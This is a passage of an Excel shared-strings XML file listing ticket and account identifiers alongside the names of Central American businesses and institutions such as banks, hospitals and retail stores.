  </si>
  <si>
    <t>ID1045070SV</t>
  </si>
  <si>
    <t>BLANQUEADORES Y DESINFECTANTES S.A DE C.V</t>
  </si>
  <si>
    <t>F4554464</t>
  </si>
  <si>
    <t>F4554472</t>
  </si>
  <si>
    <t>F4554477</t>
  </si>
  <si>
    <t>90001905565T</t>
  </si>
  <si>
    <t>F4554486</t>
  </si>
  <si>
    <t>4593251ON</t>
  </si>
  <si>
    <t>8902291T</t>
  </si>
  <si>
    <t>F4554492</t>
  </si>
  <si>
    <t>F4554511</t>
  </si>
  <si>
    <t>F4554521</t>
  </si>
  <si>
    <t>F4554525</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_COO_SAN_JN_BAUTISTA_SAC</t>
  </si>
  <si>
    <t>F4554539</t>
  </si>
  <si>
    <t>F4554541</t>
  </si>
  <si>
    <t>F4554553</t>
  </si>
  <si>
    <t>25275460SV</t>
  </si>
  <si>
    <t>LA PLUSBELLE Y SONODIGEST SA DE CV</t>
  </si>
  <si>
    <t>F4554560</t>
  </si>
  <si>
    <t>F4554565</t>
  </si>
  <si>
    <t>F4554578</t>
  </si>
  <si>
    <t>F4554580</t>
  </si>
  <si>
    <t>90001910683T</t>
  </si>
  <si>
    <t>F4586411</t>
  </si>
  <si>
    <t>1732584OH</t>
  </si>
  <si>
    <t>F4586440</t>
  </si>
  <si>
    <t>47503608T</t>
  </si>
  <si>
    <t>F4586452</t>
  </si>
  <si>
    <t>F4586460</t>
  </si>
  <si>
    <t>F4586480</t>
  </si>
  <si>
    <t>F4586483</t>
  </si>
  <si>
    <t>F4586485</t>
  </si>
  <si>
    <t>F4586486</t>
  </si>
  <si>
    <t>F4586491</t>
  </si>
  <si>
    <t>214800007T</t>
  </si>
  <si>
    <t>F4586511</t>
  </si>
  <si>
    <t>731900002T</t>
  </si>
  <si>
    <t>F4586513</t>
  </si>
  <si>
    <t>F4586518</t>
  </si>
  <si>
    <t>F4586520</t>
  </si>
  <si>
    <t>1644469OH</t>
  </si>
  <si>
    <t>OH1001052845</t>
  </si>
  <si>
    <t>F4586539</t>
  </si>
  <si>
    <t>F4586544</t>
  </si>
  <si>
    <t>F4586549</t>
  </si>
  <si>
    <t>872600044T</t>
  </si>
  <si>
    <t>791300008T</t>
  </si>
  <si>
    <t>F4586557</t>
  </si>
  <si>
    <t>F4586561</t>
  </si>
  <si>
    <t>F4586567</t>
  </si>
  <si>
    <t>F4586568</t>
  </si>
  <si>
    <t>F4597574</t>
  </si>
  <si>
    <t>F4597579</t>
  </si>
  <si>
    <t>F4597594</t>
  </si>
  <si>
    <t>F4597595</t>
  </si>
  <si>
    <t>90001905363T</t>
  </si>
  <si>
    <t>F4597610</t>
  </si>
  <si>
    <t>F4597615</t>
  </si>
  <si>
    <t>F4597620</t>
  </si>
  <si>
    <t>862000001T</t>
  </si>
  <si>
    <t>GRUPO SANTRACK GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4597624</t>
  </si>
  <si>
    <t>97100279T</t>
  </si>
  <si>
    <t>21322100SV</t>
  </si>
  <si>
    <t>AL FORNO SA DE CV</t>
  </si>
  <si>
    <t>F4597687</t>
  </si>
  <si>
    <t>F4580432</t>
  </si>
  <si>
    <t>IP2145199SV</t>
  </si>
  <si>
    <t>F4580440</t>
  </si>
  <si>
    <t>90001800996T</t>
  </si>
  <si>
    <t>F4580455</t>
  </si>
  <si>
    <t>F4580461</t>
  </si>
  <si>
    <t>F4580486</t>
  </si>
  <si>
    <t>90001902331T</t>
  </si>
  <si>
    <t>F4580497</t>
  </si>
  <si>
    <t>F4580500</t>
  </si>
  <si>
    <t>F4580502</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_SAN_LUIS_058</t>
  </si>
  <si>
    <t>F4580506</t>
  </si>
  <si>
    <t>1655959</t>
  </si>
  <si>
    <t>F4580511</t>
  </si>
  <si>
    <t>F4580514</t>
  </si>
  <si>
    <t>F4580516</t>
  </si>
  <si>
    <t>729700002T</t>
  </si>
  <si>
    <t>INGENIO SANTA ANA</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_4177</t>
  </si>
  <si>
    <t>F4580523</t>
  </si>
  <si>
    <t>F4580528</t>
  </si>
  <si>
    <t>F4580530</t>
  </si>
  <si>
    <t>F4580532</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_51</t>
  </si>
  <si>
    <t>90001905103T</t>
  </si>
  <si>
    <t>F4580552</t>
  </si>
  <si>
    <t>F4580554</t>
  </si>
  <si>
    <t>F4580555</t>
  </si>
  <si>
    <t>F4580563</t>
  </si>
  <si>
    <t>F4580569</t>
  </si>
  <si>
    <t>F4598257</t>
  </si>
  <si>
    <t>F4598258</t>
  </si>
  <si>
    <t>922174OH</t>
  </si>
  <si>
    <t>F4598262</t>
  </si>
  <si>
    <t>F4598263</t>
  </si>
  <si>
    <t>F4598264</t>
  </si>
  <si>
    <t>F4598283</t>
  </si>
  <si>
    <t>F4598286</t>
  </si>
  <si>
    <t>F4598308</t>
  </si>
  <si>
    <t>F4598309</t>
  </si>
  <si>
    <t>F4598328</t>
  </si>
  <si>
    <t>F4598335</t>
  </si>
  <si>
    <t>F4598337</t>
  </si>
  <si>
    <t>F4598341</t>
  </si>
  <si>
    <t>F4598345</t>
  </si>
  <si>
    <t>F4598346</t>
  </si>
  <si>
    <t>3734926ON</t>
  </si>
  <si>
    <t>ON0000198315/PALMARES DEL CASTILLO S.A            -</t>
  </si>
  <si>
    <t>449554ON</t>
  </si>
  <si>
    <t>F4608094</t>
  </si>
  <si>
    <t>F4608175</t>
  </si>
  <si>
    <t>1237438OH</t>
  </si>
  <si>
    <t>90001909569T</t>
  </si>
  <si>
    <t>F4549052</t>
  </si>
  <si>
    <t>F4549075</t>
  </si>
  <si>
    <t>F4549082</t>
  </si>
  <si>
    <t>513600001T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA LA CUISINE INTERNATIONAL GUATEMALA LTDA.</t>
  </si>
  <si>
    <t>F4549087</t>
  </si>
  <si>
    <t>F4549096</t>
  </si>
  <si>
    <t>F4549111</t>
  </si>
  <si>
    <t>ID1025120SV</t>
  </si>
  <si>
    <t>F4549138</t>
  </si>
  <si>
    <t>8900477T</t>
  </si>
  <si>
    <t>F4549159</t>
  </si>
  <si>
    <t>F4549166</t>
  </si>
  <si>
    <t>F4549171</t>
  </si>
  <si>
    <t>IP2142065SV</t>
  </si>
  <si>
    <t>F4549177</t>
  </si>
  <si>
    <t>1603306OH</t>
  </si>
  <si>
    <t>COOPERATIVA SONAGUERA</t>
  </si>
  <si>
    <t>F4549180</t>
  </si>
  <si>
    <t>885600004T</t>
  </si>
  <si>
    <t>F4549199</t>
  </si>
  <si>
    <t>F4584869</t>
  </si>
  <si>
    <t>F4584874</t>
  </si>
  <si>
    <t>F4584875</t>
  </si>
  <si>
    <t>F4584876</t>
  </si>
  <si>
    <t>F4584888</t>
  </si>
  <si>
    <t>F4584892</t>
  </si>
  <si>
    <t>IPG000227SV</t>
  </si>
  <si>
    <t>IP2044023SV</t>
  </si>
  <si>
    <t>F4584904</t>
  </si>
  <si>
    <t>F4584912</t>
  </si>
  <si>
    <t>F4584923</t>
  </si>
  <si>
    <t>F4584929</t>
  </si>
  <si>
    <t>F4584930</t>
  </si>
  <si>
    <t>F4584931</t>
  </si>
  <si>
    <t>F4584933</t>
  </si>
  <si>
    <t>F4584935</t>
  </si>
  <si>
    <t>5222719ON</t>
  </si>
  <si>
    <t>F4584952</t>
  </si>
  <si>
    <t>F4584954</t>
  </si>
  <si>
    <t>90001906511T</t>
  </si>
  <si>
    <t>F4584972</t>
  </si>
  <si>
    <t>90001910702T</t>
  </si>
  <si>
    <t>F4584998</t>
  </si>
  <si>
    <t>F4585000</t>
  </si>
  <si>
    <t>ID1038275SV</t>
  </si>
  <si>
    <t>EL ROSAL BEAUTY SUPPLY SA DE CV</t>
  </si>
  <si>
    <t>F4585003</t>
  </si>
  <si>
    <t>90001911279T</t>
  </si>
  <si>
    <t>90001901263T</t>
  </si>
  <si>
    <t>5324659ON</t>
  </si>
  <si>
    <t>F4618366</t>
  </si>
  <si>
    <t>F4618369</t>
  </si>
  <si>
    <t>525569ON</t>
  </si>
  <si>
    <t>90001903748T</t>
  </si>
  <si>
    <t>ID1222006SV</t>
  </si>
  <si>
    <t>F4618396</t>
  </si>
  <si>
    <t>7801142T</t>
  </si>
  <si>
    <t>F4618402</t>
  </si>
  <si>
    <t>90001910873T</t>
  </si>
  <si>
    <t>22094800SV</t>
  </si>
  <si>
    <t>SEGURIDAD SALVADORENA PROFESIONAL SA DE CV</t>
  </si>
  <si>
    <t>8900829T</t>
  </si>
  <si>
    <t>8902403T</t>
  </si>
  <si>
    <t>ID1094011SV</t>
  </si>
  <si>
    <t>CHEM SOL EL SALVADOR S.A DE C.V</t>
  </si>
  <si>
    <t>F4618432</t>
  </si>
  <si>
    <t>F4618447</t>
  </si>
  <si>
    <t>F4618454</t>
  </si>
  <si>
    <t>1191408OH</t>
  </si>
  <si>
    <t>F4618463</t>
  </si>
  <si>
    <t>F4618468</t>
  </si>
  <si>
    <t>F4618472</t>
  </si>
  <si>
    <t>F4618482</t>
  </si>
  <si>
    <t>ID1032043SV</t>
  </si>
  <si>
    <t>FUNDASAL</t>
  </si>
  <si>
    <t>317500008T</t>
  </si>
  <si>
    <t>863400097T</t>
  </si>
  <si>
    <t>F4618495</t>
  </si>
  <si>
    <t>F4618497</t>
  </si>
  <si>
    <t>F4618504</t>
  </si>
  <si>
    <t>F4618506</t>
  </si>
  <si>
    <t>90001910207T</t>
  </si>
  <si>
    <t>90001910208T</t>
  </si>
  <si>
    <t>F4546608</t>
  </si>
  <si>
    <t>F4546631</t>
  </si>
  <si>
    <t>F4546651</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4298</t>
  </si>
  <si>
    <t>535200044T</t>
  </si>
  <si>
    <t>F4556153</t>
  </si>
  <si>
    <t>F4556166</t>
  </si>
  <si>
    <t>F4556187</t>
  </si>
  <si>
    <t>F4556208</t>
  </si>
  <si>
    <t>863400024T</t>
  </si>
  <si>
    <t>F4556219</t>
  </si>
  <si>
    <t>F4556220</t>
  </si>
  <si>
    <t>F4556221</t>
  </si>
  <si>
    <t>F4556222</t>
  </si>
  <si>
    <t>F4556223</t>
  </si>
  <si>
    <t>F4556227</t>
  </si>
  <si>
    <t>F4556229</t>
  </si>
  <si>
    <t>F4556231</t>
  </si>
  <si>
    <t>F4556238</t>
  </si>
  <si>
    <t>F4556250</t>
  </si>
  <si>
    <t>F4556255</t>
  </si>
  <si>
    <t>F4556257</t>
  </si>
  <si>
    <t>F4556272</t>
  </si>
  <si>
    <t>F4556285</t>
  </si>
  <si>
    <t>F4586627</t>
  </si>
  <si>
    <t>727100008T</t>
  </si>
  <si>
    <t>F4586695</t>
  </si>
  <si>
    <t>F4597918</t>
  </si>
  <si>
    <t>F4597919</t>
  </si>
  <si>
    <t>F4597926</t>
  </si>
  <si>
    <t>F4597931</t>
  </si>
  <si>
    <t>F4598003</t>
  </si>
  <si>
    <t>F4598004</t>
  </si>
  <si>
    <t>F4598010</t>
  </si>
  <si>
    <t>F4598026</t>
  </si>
  <si>
    <t>F4598038</t>
  </si>
  <si>
    <t>F4598039</t>
  </si>
  <si>
    <t>F4598041</t>
  </si>
  <si>
    <t>F4598057</t>
  </si>
  <si>
    <t>F4598069</t>
  </si>
  <si>
    <t>F4598070</t>
  </si>
  <si>
    <t>F4584721</t>
  </si>
  <si>
    <t>F4584723</t>
  </si>
  <si>
    <t>F4584725</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3367</t>
  </si>
  <si>
    <t>F4584735</t>
  </si>
  <si>
    <t>F4584737</t>
  </si>
  <si>
    <t>90001801418T</t>
  </si>
  <si>
    <t>F4584743</t>
  </si>
  <si>
    <t>F4584746</t>
  </si>
  <si>
    <t>807900383T</t>
  </si>
  <si>
    <t>807900442T</t>
  </si>
  <si>
    <t>F4584754</t>
  </si>
  <si>
    <t>F4584756</t>
  </si>
  <si>
    <t>807900464T</t>
  </si>
  <si>
    <t>47500980T</t>
  </si>
  <si>
    <t>807900476T</t>
  </si>
  <si>
    <t>807900477T</t>
  </si>
  <si>
    <t>807900478T</t>
  </si>
  <si>
    <t>807900500T</t>
  </si>
  <si>
    <t>807900279T</t>
  </si>
  <si>
    <t>F4584793</t>
  </si>
  <si>
    <t>3742432ON</t>
  </si>
  <si>
    <t>F4584804</t>
  </si>
  <si>
    <t>675000004T</t>
  </si>
  <si>
    <t>COMPANIA DE ALIMENTOS DEL PACIFICO, S. A.</t>
  </si>
  <si>
    <t>F4584815</t>
  </si>
  <si>
    <t>F4584818</t>
  </si>
  <si>
    <t>F4584821</t>
  </si>
  <si>
    <t>F4584823</t>
  </si>
  <si>
    <t>F4584824</t>
  </si>
  <si>
    <t>807900038T</t>
  </si>
  <si>
    <t>F4584832</t>
  </si>
  <si>
    <t>807900066T</t>
  </si>
  <si>
    <t>F4584839</t>
  </si>
  <si>
    <t>807900093T</t>
  </si>
  <si>
    <t>807900348T</t>
  </si>
  <si>
    <t>807900352T</t>
  </si>
  <si>
    <t>943400001T</t>
  </si>
  <si>
    <t>INVERSIONES CABMEN, S.A.</t>
  </si>
  <si>
    <t>38300653T</t>
  </si>
  <si>
    <t>807900374T</t>
  </si>
  <si>
    <t>F4584858</t>
  </si>
  <si>
    <t>F4584865</t>
  </si>
  <si>
    <t>IPG000185SV</t>
  </si>
  <si>
    <t>BANCO ABANK,SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4599729</t>
  </si>
  <si>
    <t>47503779T</t>
  </si>
  <si>
    <t>F4599732</t>
  </si>
  <si>
    <t>IPG003905SV</t>
  </si>
  <si>
    <t>IP2001215SV</t>
  </si>
  <si>
    <t>BANCO DAVIVIENDA</t>
  </si>
  <si>
    <t>F4599747</t>
  </si>
  <si>
    <t>CONTR0001195627OC</t>
  </si>
  <si>
    <t xml:space="preserve">PRODUCTIVE BUSINESS SOLUTION COSTA RICA.					</t>
  </si>
  <si>
    <t>F4599776</t>
  </si>
  <si>
    <t>F4599800</t>
  </si>
  <si>
    <t>22044800SV</t>
  </si>
  <si>
    <t>IP2025158SV</t>
  </si>
  <si>
    <t>F4599821</t>
  </si>
  <si>
    <t>CONTR0001416619OC</t>
  </si>
  <si>
    <t>CORPORACIÓN DE COMPAÑÍAS AGROINDUSTRIALES CCA, S.R.L.</t>
  </si>
  <si>
    <t>F4599834</t>
  </si>
  <si>
    <t>22187100SV</t>
  </si>
  <si>
    <t>GRUPO MULTINET SA DE CV</t>
  </si>
  <si>
    <t>F4599840</t>
  </si>
  <si>
    <t>90001908997T</t>
  </si>
  <si>
    <t>F4599859</t>
  </si>
  <si>
    <t>473800030T</t>
  </si>
  <si>
    <t>F4599866</t>
  </si>
  <si>
    <t>23464200SV</t>
  </si>
  <si>
    <t>AEROMANTENIMIENTO S.A.</t>
  </si>
  <si>
    <t>F4608442</t>
  </si>
  <si>
    <t>F4608443</t>
  </si>
  <si>
    <t>F4608444</t>
  </si>
  <si>
    <t>F4608447</t>
  </si>
  <si>
    <t>F4608459</t>
  </si>
  <si>
    <t>IP2204108SV</t>
  </si>
  <si>
    <t>F4608462</t>
  </si>
  <si>
    <t>F4608464</t>
  </si>
  <si>
    <t>915836OH</t>
  </si>
  <si>
    <t>F4608471</t>
  </si>
  <si>
    <t>F4608475</t>
  </si>
  <si>
    <t>F4608478</t>
  </si>
  <si>
    <t>418200001T</t>
  </si>
  <si>
    <t>418200002T</t>
  </si>
  <si>
    <t>F4608485</t>
  </si>
  <si>
    <t>70199OH</t>
  </si>
  <si>
    <t>F4608518</t>
  </si>
  <si>
    <t>679893OH</t>
  </si>
  <si>
    <t>938000003T</t>
  </si>
  <si>
    <t>725742</t>
  </si>
  <si>
    <t>826900022T</t>
  </si>
  <si>
    <t>F4608535</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4071</t>
  </si>
  <si>
    <t>245700094T</t>
  </si>
  <si>
    <t>F4608557</t>
  </si>
  <si>
    <t>ID1026313SV</t>
  </si>
  <si>
    <t>FONDO DE POBLACION DE LAS NACIONES UNIDAS</t>
  </si>
  <si>
    <t>F4608560</t>
  </si>
  <si>
    <t>F4608578</t>
  </si>
  <si>
    <t>F4608597</t>
  </si>
  <si>
    <t>F4608599</t>
  </si>
  <si>
    <t>F4550342</t>
  </si>
  <si>
    <t>842100001T</t>
  </si>
  <si>
    <t>COMPAÑIA INTERNACIONAL DE PRODUCTOS Y SERVICIOS, S.A.</t>
  </si>
  <si>
    <t>582100002T</t>
  </si>
  <si>
    <t>F4550379</t>
  </si>
  <si>
    <t>323800023T</t>
  </si>
  <si>
    <t>F4550396</t>
  </si>
  <si>
    <t>1405528OH</t>
  </si>
  <si>
    <t>UNIVERSIDAD TECNOLOGICA DE HONDURAS</t>
  </si>
  <si>
    <t>90001908422T</t>
  </si>
  <si>
    <t>25119000SV</t>
  </si>
  <si>
    <t>F4550424</t>
  </si>
  <si>
    <t>F4550432</t>
  </si>
  <si>
    <t>F4550435</t>
  </si>
  <si>
    <t>F4550437</t>
  </si>
  <si>
    <t>F4550439</t>
  </si>
  <si>
    <t>26683200SV</t>
  </si>
  <si>
    <t>F4550441</t>
  </si>
  <si>
    <t>F4550445</t>
  </si>
  <si>
    <t>F4550450</t>
  </si>
  <si>
    <t>F4550461</t>
  </si>
  <si>
    <t>254100031T</t>
  </si>
  <si>
    <t>F4550473</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T227</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CIUDAD_VIEJA</t>
  </si>
  <si>
    <t>F4585350</t>
  </si>
  <si>
    <t>F4585369</t>
  </si>
  <si>
    <t>F4585399</t>
  </si>
  <si>
    <t>F4585409</t>
  </si>
  <si>
    <t>F4585429</t>
  </si>
  <si>
    <t>F4585525</t>
  </si>
  <si>
    <t>F4585526</t>
  </si>
  <si>
    <t>F4619128</t>
  </si>
  <si>
    <t>F4619137</t>
  </si>
  <si>
    <t>F4619142</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_0808</t>
  </si>
  <si>
    <t>F4619156</t>
  </si>
  <si>
    <t>F4619166</t>
  </si>
  <si>
    <t>427100107T</t>
  </si>
  <si>
    <t>360900028T</t>
  </si>
  <si>
    <t>F4619172</t>
  </si>
  <si>
    <t>F4619174</t>
  </si>
  <si>
    <t>F4619184</t>
  </si>
  <si>
    <t>F4619187</t>
  </si>
  <si>
    <t>F4619200</t>
  </si>
  <si>
    <t>F4619202</t>
  </si>
  <si>
    <t>8902411T</t>
  </si>
  <si>
    <t>25371200SV</t>
  </si>
  <si>
    <t>F4619219</t>
  </si>
  <si>
    <t>CONTR0002026212OC</t>
  </si>
  <si>
    <t>CORPORACION DE COMPAÑIAS AGROINDUSTRIALES CCA SRL</t>
  </si>
  <si>
    <t>IP2001128SV</t>
  </si>
  <si>
    <t>F4619242</t>
  </si>
  <si>
    <t>F4619245</t>
  </si>
  <si>
    <t>F4619248</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0340</t>
  </si>
  <si>
    <t>F4619249</t>
  </si>
  <si>
    <t>F4619254</t>
  </si>
  <si>
    <t>F4619265</t>
  </si>
  <si>
    <t>F4547916</t>
  </si>
  <si>
    <t>F4547924</t>
  </si>
  <si>
    <t>F4547927</t>
  </si>
  <si>
    <t>428000001T</t>
  </si>
  <si>
    <t>SERVICIOS DE TRANSPORTE DE ACERO S.A.</t>
  </si>
  <si>
    <t>F4547931</t>
  </si>
  <si>
    <t>F4547944</t>
  </si>
  <si>
    <t>F4547972</t>
  </si>
  <si>
    <t>F4547973</t>
  </si>
  <si>
    <t>F4547975</t>
  </si>
  <si>
    <t>F4547976</t>
  </si>
  <si>
    <t>F4547981</t>
  </si>
  <si>
    <t>F4547983</t>
  </si>
  <si>
    <t>F4548018</t>
  </si>
  <si>
    <t>F4548020</t>
  </si>
  <si>
    <t>IP2041104SV</t>
  </si>
  <si>
    <t>1465181OH</t>
  </si>
  <si>
    <t>SUPERTIENDAS XTRA</t>
  </si>
  <si>
    <t>F4548035</t>
  </si>
  <si>
    <t>CONTR0001427769OC</t>
  </si>
  <si>
    <t>IP2112137SV</t>
  </si>
  <si>
    <t>F4548045</t>
  </si>
  <si>
    <t>F4548050</t>
  </si>
  <si>
    <t>F4548054</t>
  </si>
  <si>
    <t>F4536843</t>
  </si>
  <si>
    <t>F4556954</t>
  </si>
  <si>
    <t>90001910790T</t>
  </si>
  <si>
    <t>400000045T</t>
  </si>
  <si>
    <t>F4556959</t>
  </si>
  <si>
    <t>F4556961</t>
  </si>
  <si>
    <t>F4556969</t>
  </si>
  <si>
    <t>F4556970</t>
  </si>
  <si>
    <t>F4556975</t>
  </si>
  <si>
    <t>F4556984</t>
  </si>
  <si>
    <t>F4556989</t>
  </si>
  <si>
    <t>630200014T</t>
  </si>
  <si>
    <t>F4557002</t>
  </si>
  <si>
    <t>F4557003</t>
  </si>
  <si>
    <t>1613709OH</t>
  </si>
  <si>
    <t>INVERSIONES JADEB S DE R.L</t>
  </si>
  <si>
    <t>927700006T</t>
  </si>
  <si>
    <t>1011269OH</t>
  </si>
  <si>
    <t>284500046T</t>
  </si>
  <si>
    <t>8902196T</t>
  </si>
  <si>
    <t>8900505T</t>
  </si>
  <si>
    <t>F4557028</t>
  </si>
  <si>
    <t>F4557035</t>
  </si>
  <si>
    <t>25269900SV</t>
  </si>
  <si>
    <t>PULLMANTUR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4557052</t>
  </si>
  <si>
    <t>F4557054</t>
  </si>
  <si>
    <t>939828OH</t>
  </si>
  <si>
    <t>25102700SV</t>
  </si>
  <si>
    <t>C.D.E. INSTITUTO NACIONAL DE SAN BARTOLO</t>
  </si>
  <si>
    <t>F4557073</t>
  </si>
  <si>
    <t>8900808T</t>
  </si>
  <si>
    <t>F4557078</t>
  </si>
  <si>
    <t>807900248T</t>
  </si>
  <si>
    <t>865500002T</t>
  </si>
  <si>
    <t>K-FE, S.A.</t>
  </si>
  <si>
    <t>F4588831</t>
  </si>
  <si>
    <t>5544258ON</t>
  </si>
  <si>
    <t>F4588836</t>
  </si>
  <si>
    <t>F4588837</t>
  </si>
  <si>
    <t>F4588839</t>
  </si>
  <si>
    <t>1010729OH</t>
  </si>
  <si>
    <t>F4588847</t>
  </si>
  <si>
    <t>3804630ON</t>
  </si>
  <si>
    <t>F4588860</t>
  </si>
  <si>
    <t>F4588862</t>
  </si>
  <si>
    <t>17400287T</t>
  </si>
  <si>
    <t>90001905160T</t>
  </si>
  <si>
    <t>F4588883</t>
  </si>
  <si>
    <t>F4588898</t>
  </si>
  <si>
    <t>F4588914</t>
  </si>
  <si>
    <t>F4588915</t>
  </si>
  <si>
    <t>F4588924</t>
  </si>
  <si>
    <t>F4588928</t>
  </si>
  <si>
    <t>F4588936</t>
  </si>
  <si>
    <t>F4588943</t>
  </si>
  <si>
    <t>DIAZ DURAN Y ASOCIADOS S.A.</t>
  </si>
  <si>
    <t>F4588966</t>
  </si>
  <si>
    <t>25945000SV</t>
  </si>
  <si>
    <t>HOSPITAL NACIONAL DR. JUAN JOSE FERNANDEZ ZACAMIL</t>
  </si>
  <si>
    <t>1095721OH</t>
  </si>
  <si>
    <t>F4598415</t>
  </si>
  <si>
    <t>F4598437</t>
  </si>
  <si>
    <t>F4598438</t>
  </si>
  <si>
    <t>F4598441</t>
  </si>
  <si>
    <t>F4598443</t>
  </si>
  <si>
    <t>F4598466</t>
  </si>
  <si>
    <t>F4598477</t>
  </si>
  <si>
    <t>CONTR0002076666OC</t>
  </si>
  <si>
    <t>F4598500</t>
  </si>
  <si>
    <t>F4598517</t>
  </si>
  <si>
    <t>47502984T</t>
  </si>
  <si>
    <t>F4585183</t>
  </si>
  <si>
    <t>F4585190</t>
  </si>
  <si>
    <t>F4585192</t>
  </si>
  <si>
    <t>F4585194</t>
  </si>
  <si>
    <t>IPG003081SV</t>
  </si>
  <si>
    <t>F4585218</t>
  </si>
  <si>
    <t>F4585231</t>
  </si>
  <si>
    <t>F4585232</t>
  </si>
  <si>
    <t>F4585239</t>
  </si>
  <si>
    <t>F4585253</t>
  </si>
  <si>
    <t>F4585273</t>
  </si>
  <si>
    <t>F4585279</t>
  </si>
  <si>
    <t>F4585286</t>
  </si>
  <si>
    <t>F4585298</t>
  </si>
  <si>
    <t>F4585303</t>
  </si>
  <si>
    <t>F4585304</t>
  </si>
  <si>
    <t>F4585319</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_TIENDA_0164</t>
  </si>
  <si>
    <t>F4599896</t>
  </si>
  <si>
    <t>25274800SV</t>
  </si>
  <si>
    <t>FIRST CASH SV</t>
  </si>
  <si>
    <t>F4599901</t>
  </si>
  <si>
    <t>F4599903</t>
  </si>
  <si>
    <t>21333100SV</t>
  </si>
  <si>
    <t>HOSPITAL NACIONAL DE NINOS BENJAMIN BLOOM</t>
  </si>
  <si>
    <t>F4599912</t>
  </si>
  <si>
    <t>21326800SV</t>
  </si>
  <si>
    <t>F4599921</t>
  </si>
  <si>
    <t>F4599922</t>
  </si>
  <si>
    <t>F4599926</t>
  </si>
  <si>
    <t>F4599928</t>
  </si>
  <si>
    <t>F4599929</t>
  </si>
  <si>
    <t>F4599936</t>
  </si>
  <si>
    <t>646400003T</t>
  </si>
  <si>
    <t>ARISA (ADMINISTRADORA DE RIESGO DE CENTRO AMERICA)</t>
  </si>
  <si>
    <t>F4599954</t>
  </si>
  <si>
    <t>F4599970</t>
  </si>
  <si>
    <t>CONTR0001962833OC</t>
  </si>
  <si>
    <t>F4599983</t>
  </si>
  <si>
    <t>F4599984</t>
  </si>
  <si>
    <t>631300001T</t>
  </si>
  <si>
    <t>LABORATORIO ECOLOGICO Y QUIMICO, S.A.</t>
  </si>
  <si>
    <t>F4600001</t>
  </si>
  <si>
    <t>F4600003</t>
  </si>
  <si>
    <t>F4600009</t>
  </si>
  <si>
    <t>F4600010</t>
  </si>
  <si>
    <t>F4600016</t>
  </si>
  <si>
    <t>1516426OH</t>
  </si>
  <si>
    <t>F4608604</t>
  </si>
  <si>
    <t>F4608605</t>
  </si>
  <si>
    <t>F4608608</t>
  </si>
  <si>
    <t>F4608612</t>
  </si>
  <si>
    <t>F4608616</t>
  </si>
  <si>
    <t>F4608620</t>
  </si>
  <si>
    <t>638100011T</t>
  </si>
  <si>
    <t>F4608643</t>
  </si>
  <si>
    <t>F4608650</t>
  </si>
  <si>
    <t>F4608651</t>
  </si>
  <si>
    <t>F4608663</t>
  </si>
  <si>
    <t>F4608669</t>
  </si>
  <si>
    <t>47501705T</t>
  </si>
  <si>
    <t>F4608685</t>
  </si>
  <si>
    <t>F4608697</t>
  </si>
  <si>
    <t>F4608702</t>
  </si>
  <si>
    <t>F4608709</t>
  </si>
  <si>
    <t>F4608716</t>
  </si>
  <si>
    <t>F4608717</t>
  </si>
  <si>
    <t>F4608719</t>
  </si>
  <si>
    <t>F4608720</t>
  </si>
  <si>
    <t>1744932OH</t>
  </si>
  <si>
    <t>F4608731</t>
  </si>
  <si>
    <t>90001910181T</t>
  </si>
  <si>
    <t>F4608738</t>
  </si>
  <si>
    <t>22398200SV</t>
  </si>
  <si>
    <t>SUCA ES SA DE CV</t>
  </si>
  <si>
    <t>F4554079</t>
  </si>
  <si>
    <t>265900258T</t>
  </si>
  <si>
    <t>F4554085</t>
  </si>
  <si>
    <t>F4554128</t>
  </si>
  <si>
    <t>F4554142</t>
  </si>
  <si>
    <t>F4554208</t>
  </si>
  <si>
    <t>F4587392</t>
  </si>
  <si>
    <t>F4587401</t>
  </si>
  <si>
    <t>F4587408</t>
  </si>
  <si>
    <t>5359484ON</t>
  </si>
  <si>
    <t>F4587421</t>
  </si>
  <si>
    <t>F4587425</t>
  </si>
  <si>
    <t>F4587437</t>
  </si>
  <si>
    <t>F4587449</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0352</t>
  </si>
  <si>
    <t>F4587450</t>
  </si>
  <si>
    <t>F4587458</t>
  </si>
  <si>
    <t>8902198T</t>
  </si>
  <si>
    <t>F4587460</t>
  </si>
  <si>
    <t>F4587468</t>
  </si>
  <si>
    <t>IP2028421SV</t>
  </si>
  <si>
    <t>SERVICIO GENERALES BURSATILESS.A</t>
  </si>
  <si>
    <t>F4587475</t>
  </si>
  <si>
    <t>F4587487</t>
  </si>
  <si>
    <t>F4587491</t>
  </si>
  <si>
    <t>3612675ON</t>
  </si>
  <si>
    <t>F4587503</t>
  </si>
  <si>
    <t>F4587511</t>
  </si>
  <si>
    <t>F4587512</t>
  </si>
  <si>
    <t>F4587514</t>
  </si>
  <si>
    <t>F4587518</t>
  </si>
  <si>
    <t>F4587526</t>
  </si>
  <si>
    <t>F4587527</t>
  </si>
  <si>
    <t>361700095T</t>
  </si>
  <si>
    <t>292900599T</t>
  </si>
  <si>
    <t>F4619271</t>
  </si>
  <si>
    <t>F4619275</t>
  </si>
  <si>
    <t>F4619276</t>
  </si>
  <si>
    <t>F4619279</t>
  </si>
  <si>
    <t>F4619280</t>
  </si>
  <si>
    <t>F4619290</t>
  </si>
  <si>
    <t>F4619312</t>
  </si>
  <si>
    <t>8902222T</t>
  </si>
  <si>
    <t>8901437T</t>
  </si>
  <si>
    <t>F4619321</t>
  </si>
  <si>
    <t>F4619322</t>
  </si>
  <si>
    <t>F4619337</t>
  </si>
  <si>
    <t>F4619338</t>
  </si>
  <si>
    <t>F4619352</t>
  </si>
  <si>
    <t>F4619353</t>
  </si>
  <si>
    <t>F4619359</t>
  </si>
